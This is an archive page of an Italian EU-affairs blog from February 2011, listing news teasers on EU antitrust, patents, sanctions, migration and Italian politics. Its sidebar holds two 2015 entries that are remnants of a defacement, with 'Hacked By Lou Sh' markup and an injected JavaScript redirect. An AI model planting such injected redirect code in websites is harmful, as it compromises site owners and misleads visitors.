EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Febbraio 2011
it

Lunedì 24 gennaio la Commissione europea ha aperto un’inchiesta formale sui rapporti di mercato tra Portogallo e Spagna per accertare la violazione delle regole antitrust ad opera di due delle maggiori società dei paesi protagonisti della vicenda.

Si tratta della Portugal Telecom sgps, la più grande compagnia di telecomunicazioni in Portogallo fondata nel 1994; e della Telefonica spagnola (con il marchio Movistar), operante nello stesso settore e seconda società più grande in Spagna, dietro a Groupo Santander. Le due compagnie leader dei (...)

it

Al prossimo Consiglio della Competitività previsto per il mese di marzo l’Unione approverà la procedura di cooperazione rafforzata a maggioranza qualificata con l’obiettivo di far partire e concludere il nuovo iter legislativo sui brevetti entro la fine del 2011. Una decisione che di fatto esclude Roma e Madrid dalla questione nonostante le vivaci proteste riguardo le lingue previste per la traduzione.

La procedura è stata sancita nell’ultimo Consiglio della Competitività dello scorso 10 dicembre, con una maggioranza di 23 stati su 27: all’Italia e alla Spagna, dichiaratesi nettamente contrarie sulla questione linguistica, si sono aggiunte Repubblica Ceca e Cipro, che hanno espresso la propria (...)

it

Il ministro dell' Economia Giulio Tremonti si è fermato meno di mezza giornata nel villaggio svizzero dove l' élite globale si dà appuntamento tutti gli anni: il messaggio che intendeva portare a Davos è risuonato chiaramente soprattutto dal palco pubblico del Centro Congressi.

Il WEF di Davos La sala d’ingresso del Centro Congressi del WEF 2011 Con lui c’erano, fra gli altri, l’ ex presidente cilena Michelle Bachelet e il premier thailandese Abhisit Vejjajiva, volto di un governo che pochi mesi fa ha sparato in strada a centinaia di manifestanti, uno dei paradossi (...)

it

Il traffico di organi è un argomento di scottante attualità. Parlando di questo turpe fatto, la maggioranza delle persone è portata a pensare ai rapimenti di tutti quei bambini scomparsi in circostanze misteriose. Forse non tutti sanno che molte volte a muovere questa macchina criminale, stando al rapporto Marty, è proprio lo Stato. Come nel caso della sparizione e della morte di molti dei prigionieri caduti nelle mani del regime durante la guerra in Kosovo.

Netta la maggioranza da parte del Parlamento Europeo, che ha approvato, martedì 26 gennaio, la risoluzione di Dick Marty, contro i crimini commessi in Kosovo, riguardanti traffico illegale di armi, droghe e organi umani. Dick Marty Il senatore svizzero si è impegnato in anni di indagini per (...)

it

L’Italia “sostiene pienamente il documento Ue che parla di transizione ordinata verso la democrazia e riconosce le legittime aspettative democratiche del popolo egiziano, senza interferenze paternalistiche e senza indicare la strada da seguire: la strada la indicheranno gli egiziani... Noi rispettiamo le scelte che farà il popolo egiziano”: questo il commento del ministro degli Esteri, Franco Frattini, al termine del Consiglio europeo svoltosi il 31 gennaio scorso.

La discussione in Consiglio sulla questione Egitto, seppur durata due ore e mezzo, ha portato ad un risultato condiviso tra i Paesi membri, come spiegato dal capo della Farnesina: “Non c’è stata diversificazione, ma la condivisione di alcuni obiettivi di fondo: che la stabilità dell’Egitto è un (...)

it

È questa infatti la prima sanzione che i Paesi dell’U.E. hanno deciso di adottare per protesta contro il presidente bielorusso Alexander Lukashenko dopo l’arresto di diversi esponenti dell’opposizione in seguito alle elezioni presidenziali del 19 dicembre scorso, vinte dal dittatore con una maggioranza schiacciante ma con diverse denunce di brogli elettorali. Nuovi provvedimenti che si vanno ad aggiungere a quelli soprattutto economici imposti dagli Stati Uniti, il regime di Lukashenko ne prende atto ma replica dicendo di non temere queste sanzioni.

Sanzioni che però l’Unione Europea aveva già deciso di adottare nel 2008 per mettere un freno al potere sempre più ampio del presidente Lukashenko. Poi i provvedimenti erano stati sospesi, per essere ripristinati ora dopo aver constatato quanto accaduto in Bielorussia, dove i manifestanti che (...)

it

L’assemblea plenaria del Parlamento riunita a Bruxelles, ha approvato con 374 voti a favore, 208 contrari e 38 astenuti un documento molto severo nei confronti della situazione campana e ha respinto tutti gli emendamenti presentati da 40 deputati italiani appartenenti al Partito popolare europeo. Il Parlamento richiede inoltre che il blocco dei fondi venga protratto fin quando non verranno fornite alla Commissione europea prove certe dell’esistenza di un piano rifiuti conforme alla normativa Ue in materia.

Nella sua risoluzione dello scorso 3 febbraio, il Parlamento chiede di bloccare i 145,5 milioni di fondi europei destinati alla gestione della crisi in Campania; e come se non bastasse, proprio in questi giorni rispuntano già i primi cumuli di immondizia sulle strade e ai bordi dei marciapiedi, (...)

it

Questo il suggerimento del Commissario per le Politiche regionali dell'Unione europea Johannes Hahn, durante una conferenza stampa sul futuro dei fondi europei.

Il governo dovrebbe utilizzare una parte dei finanziamenti europei destinati alla coesione economica, sociale e territoriale, per avviare un processo di ristrutturazione degli scavi di Pompei e di numerosi altri siti archeologici italiani. Un’indicazione del Commissario europeo Johannes Hahn, (...)

it

Finisce l’era dei prodotti agroalimentari spacciati per italiani grazie alla nuova legge sulla trasparenza dei prodotti. Non avremo più a che fare con mozzarelle “napoletane” della Germania o con i salumi romagnoli direttamente dalla Cina. Dall’attuazione del decreto i consumatori potranno accertarsi direttamente sulla reale provenienza dei prodotti alimentari.

Lo scorso 12 gennaio la Commissione Agricoltura della Camera ha approvato in via definitiva la legge sull’“etichettatura” e sul “pacchetto qualità”. Fino ad oggi le etichette d’origine in Italia erano obbligatorie solo per pochi prodotti: uova, latte fresco, carne, passata di pomodoro e olio extra (...)

it

“L'adesione della Serbia e dei Balcani occidentali all'Unione Europea è un forte interesse strategico non solo per Belgrado, ma anche per la stessa Europa”. Queste sono le parole di Franco Frattini, Ministro degli Esteri italiano, rilasciate in un conferenza stampa congiunta con Vuk Jeremic, suo collega belgradese, tenutasi l’8 febbraio 2011 nel paese balcanico.

L’Italia, ed insieme a lei l’Europa, nel 2011, tornano a ribadire il proprio interesse per la Serbia. Ad accendere i riflettori su questo paese, per fortuna, non sono solamente i riflettori dello stadio “Luigi Ferraris” di Genova, in cui, il 12 ottobre 2010, un gruppo di ultrà serbi provocò scontri (...)

it

Si è chiusa domenica 6 Febbraio la giornata mondiale contro le mutilazioni genitali femminili. Sebbene il fenomeno di questa assurda pratica sia in calo, il lavoro da fare perché resti soltanto un amaro capitolo della storia dell’umanità è ancora lungo e, tristemente, le ricerche ci informano che il fenomeno si è allargato anche nei Paesi più sviluppati come conseguenza dell’immigrazione.

Alla fine sono state raccolte 18 mila firme, 18 mila no contro le mutilazioni genitali femminili. In migliaia di piazze si è potuta dichiarare la propria opinione su una pratica, che sebbene sembrerebbe ormai antica e passata, purtroppo è ancora oggi attualissima. La giornata è stata organizzata (...)

it

Per combattere la volatilità dei prezzi, e soprattutto il protezionismo delle materie prime, Bruxelles ha presentato una comunicazione con lo scopo di dare linfa vitale all’industria continentale.

L’iniziativa avanzata dai vicepresidenti della Commissione europea, Antonio Tajani(industria) e Michel Barnier(mercato unico), non solo ha lo scopo di rinforzare una solidarietà industriale europea, ma anche di tutelare i consumatori costretti ad adeguarsi alle scosse ingiustificate dei prezzi. (...)

it

Tre bambini, Raul Mircea, il più piccolo di 4 anni, Fernando, 5 anni e Sebastian, 11 anni, e una bimba, Patrizia, di otto anni, probabilmente morti nel sonno. A quanto riferito da alcuni abitanti dell'insediamento, i fratellini erano stati lasciati soli nella baracca.

Il Capo dello Stato si è recato all’Istituto di medicina legale del Verano, in visita alle salme dei bambini, e ha incontrato i genitori dei piccoli. A provocare il rogo, probabilmente un braciere acceso per il freddo. Presente anche il sindaco della città Gianni Alemanno: "Napolitano ha espresso (...)

it

Inutile ogni misura restrittiva adottata finora per scongiurare il superamento del valori limite in fatto d’inquinamento ambientale, che nel capoluogo lombardo risultano addirittura il doppio rispetto alle indicazioni comunitarie. Con la giornata di lunedì la città ha superato i 35 giorni di tolleranza annui proposti dall’Unione Europea, andando così inevitabilmente incontro alla sanzioni previste. Si cercano ora nuovi rimedi per migliorare la situazione.

Rimedi che però devono essere subito adottati e rivisti, perché in pratica non sono serviti a nulla i blocchi al traffico veicolare e le conseguenti domeniche a piedi: Milano si conferma una delle metropoli europee più inquinate. È questo il triste verdetto emanato dalle centraline dell’Arpa, (...)

it

In un incontro tenutosi lo scorso 7 febbraio presso lo Spazio Europa della Rappresentanza della Commissione europea a Roma in Via Quattro Novembre 149, i rappresentanti del Parlamento europeo, Gianni Pittella e Roberta Angelilli, il vicepresidente della Commissione Antonio Tajani e il capo del Dipartimento Politiche comunitarie della Presidenza del Consiglio professor Roberto Adam, hanno rinnovato, anche per il 2011, l’accordo di partenariato di gestione nell’ambito della comunicazione europea.

Il partenariato di gestione tra UE ed Italia è stato attivato per la prima volta nel 2008 allo scopo di attuare la politica di informazione e comunicazione del progetto comunitario: l’accordo si concretizzò attraverso la firma di un memorandum di intesa tra la Commissione, il Parlamento e il (...)

it

Il concorso, giunto alla sua quarta edizione, è organizzato dall’Associazione Arcospazio Cultura in collaborazione con la Rappresentanza in Italia della Commissione europea.

Il concorso è rivolto agli studenti delle scuole di ogni ordine e grado presenti sul territorio italiano. Si può partecipare scrivendo un racconto, una poesia o un elaborato in qualsiasi forma (disegno, progetto) che esalti la conoscenza e il senso di appartenenza all’Unione europea. L’obiettivo (...)

it

Qui si fa "l'Europa" o si muore. Il motto, reinterpretato, con cui Giuseppe Garibaldi vinse la battaglia di Calatafimi nel 1860, sembra risuonare lungo i corridoi di Palazzo Koch, sede centrale della Banca d’Italia a Roma. Nelle celebrazioni per il 150esimo anniversario dell’Unità, il Bel Paese prova a riprendersi un ruolo a livello europeo e internazionale attraverso la candidatura di Mario Draghi a governatore della Banca Centrale Europea. Che un nuovo risorgimento italoeuropeo sia alle porte?

Molto è passato nel corso della storia d’Italia, da quando Mazzini e Garibaldi infiammavamo i cuori d’Europa con le loro avventure e le loro gesta. Paese fondatore della Comunità del Carbone e dell’Acciaio nel 1951 e membro costituente della moneta unica nel 1996, oggigiorno, come allora, la (...)

it

Così ha risposto in un intervento sulla home page del quotidiano online della Free Foundation, il Ministro della Pubblica Amministrazione all’appello pubblico lanciato il 31 gennaio sul Corriere della Sera per la promozione di un’Agenda Digitale italiana da realizzarsi nei prossimi 100 giorni.

Il progetto“Diamo all’Italia una strategia digitale”, è stato lanciato con lo scopo di ridurre il digital divide con i paesi europei più evoluti e per sconfiggere l’analfabetismo digitale. La replica del Ministro Brunetta, che ha reputato l’appello “un fatto molto positivo”, ha confuso però le idee (...)

19
02
2011

L’ora del Sud?

it

L’investitura di “città culturale europea” è un riconoscimento che viene assegnato ogni anno ad una città di uno degli Stati membri, al fine di promuovere e di far conoscere la diversità e la ricchezza di ogni Paese, in modo da ottenere una fusione europea, anche, culturale. La designazione offre alla città prescelta di organizzare, per un anno intero, manifestazione ed eventi che possano far conoscere la propria realtà culturale a tutta la comunità europea.

Per l’anno 2019 è stata candidata la città di Catanzaro, che avrà l’opportunità di portare alla luce le meraviglie che il capoluogo calabrese possiede. È stata accolta dalla giunta comunale di Catanzaro, la richiesta di candidatura della città, per essere riconosciuta nell’anno 2019 “città culturale (...)

it

L’Olanda guida la classifica dei paesi con la più alta percentuale di impiegati part-time, in Italia invece il fenomeno non è ancora del tutto esteso anche se è in costante crescita. Sono le donne la categoria più rappresentata, inoltre il part-time comincia ad essere una risorsa anche nelle posizioni di alto profilo e management.

Il lavoro a tempo parziale sembra riscuotere successo soprattutto nei confronti di chi non può permettersi una occupazione a tempo pieno, rischiando con questo di restare al di fuori del mondo del lavoro. L’Eurofound ha elaborato uno studio al riguardo, da cui è scaturito che il paese con il (...)

21
02
2011

Stage Up and Go! 2

it

Up and Go! 2, "Esperienze transnazionali per la vita indipendente e l’empowerment” è un’occasione concreta per i giovani in condizioni disagiate, spesso esclusi dai circuiti tradizionali che regolamentano la libera circolazione in Europa.

Una seconda edizione “allargata”, per numero di persone e provincie coinvolte, in una formula ideata per sperimentare la propria autonomia all’interno di un percorso strutturato che risponda in maniera concreta alle particolarità individuali. L’iniziativa, completamente gratuita, è rivolta a 140 (...)

it

La manifestazione di sdegno e di protesta che ha portato migliaia di donne agguerrite nelle piazze di tutta Italia contro il premier Silvio Berlusconi ha fatto il giro del mondo intero, comparendo tra le prime pagine e i primi servizi dei media europei ed internazionali.

Fra i commenti spicca quello del Financial Times, l’ostico quotidiano di Londra. In un editoriale non firmato, quindi espressione della direzione del giornale, nella pagina "Op-Ed" (opinioni ed editoriali), subito al di sotto del motto del Ft, "Without fear and without favor", ossia senza timori (...)

it

Il Maghreb è in tumulto, e così migliaia di persone si avventurano in “viaggi della speranza” attraverso il Mediterraneo. La grande meta da raggiungere è l’isola di Lampedusa ma non sono rari sbarchi anche sulle coste calabresi e sarde. In una settimana si sono registrati più di quattromila sbarchi.

Egiziani, tunisini, algerini, marocchini e libici, sono assiepati nei centri di permanenza temporanea di Lampedusa, ma ormai le strutture della piccola isola sono al collasso, e gli immigrati iniziano a creare disagi e tensioni agli abitanti dell’isola. Così sono iniziati i primi trasferimenti a (...)

it

“Che cosa è il Mediterraneo? Mille cose al tempo stesso. Non un paesaggio, ma innumerevoli paesaggi. Non un mare ma una successione di mari. Non una civiltà ma più civiltà ammassate l’una sull’altra. Il Mediterraneo è un antico crocevia. Da millenni tutto è confluito verso quel mare, scompigliando e arricchendo la sua storia”.

Dal 1989, quando queste parole comparivano nel saggio “Il Mediterraneo - Lo spazio e la storia, gli uomini e la tradizione” dello storico Fernand Braudel, molto è cambiato tra le sponde del “Mare nostrum”. Tutto è stato detto su questa “patria dei miti”, ma solo negli ultimi anni ci siamo resi conto (...)

it

La Terra, la nostra casa, la casa di tutti noi, si sgretola ogni giorno un po’ di più sotto i nostri piedi. Un cambiamento così drammatico e irreversibile contro di cui non possiamo fare niente data la nostra limitatezza. O forse non è così?

Una tappa del viaggio per dare risposta a questa domanda passa anche per la Garbatella il 26 febbraio alle ore 11:00. Il centro “Casetta Rossa” ospita un interessante incontro nell’ambito del progetto “Europe on the ground” con la compartecipazione del Circolo Legambiente Garbatella, sul tema del (...)

it

L’evento, organizzato in partnership tra l’Ufficio di informazione in Italia del Parlamento europeo, la Rappresentanza in Italia della Commissione europea, il Dipartimento per le politiche comunitarie e il Ministero degli Affari Esteri, vuole celebrare lo spirito dell’integrazione europea. Come si legge dal sito ufficiale dell’evento, “il festival d’Europa, ideato e coordinato dall’Istituto Universitario Europeo (IUE), si propone di mettere in risalto questa “originale” vocazione del capoluogo toscano. […] Il “cuore” dell’iniziativa è costituito dall’organizzazione di una “Conferenza sullo Stato dell’Unione”, nella quale si discuterà al massimo livelli del progresso fatto sul cammino dell’integrazione europea dopo il Trattato di Lisbona”.

Infatti, sono in pochi a sapere che a Firenze ha sede l’Istituto Universitario Europeo, la sola struttura accademica fondata dai Paesi membri della Comunità europea, che si impegna a fornire un contributo intellettuale al processo di integrazione europea. Proprio per valorizzare questo (...)

it

Italia richiamata all'ordine. L'unione europea, la invita, senza troppi convenevoli, a ridimensionare i poteri che il Golden share sulle aziende privatizzate. Per l'Italia è già il secondo richiamo, e ora l'ultimatum.

Il secondo richiamo per l’Italia da parte della commissione europea, il secondo in due anni. Il vecchio Stivale è stato accusato di abusare dei poteri speciali che la Golden share dona al governo su decisioni importanti di aziende privatizzate, dove lo stato possiede una quota. La Golden share è (...)

it

Lo afferma l'Alto rappresentante per la politica estera e di sicurezza comune europea, Catherine Ashton, in un articolo da lei scritto e pubblicato nei giorni scorsi nella sezione 'opinioni' dell'International Herald Tribune, l'edizione internazionale del New York Times. Anche la foto di Muammar Gheddafi è stata rimossa dallo Justus Lipsius, il palazzo di Bruxelles in cui ha sede il Consiglio europeo.

Gheddafi Il dittatore libico Muammar al Gheddafi La Ashton aveva convocato in precedenza una riunione straordinaria degli ambasciatori dei Paesi Ue per discutere di ulteriori azioni nei confronti della Libia, "incluse delle possibili misure restrittive”. Al leader libico Muammar Gheddafi, (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France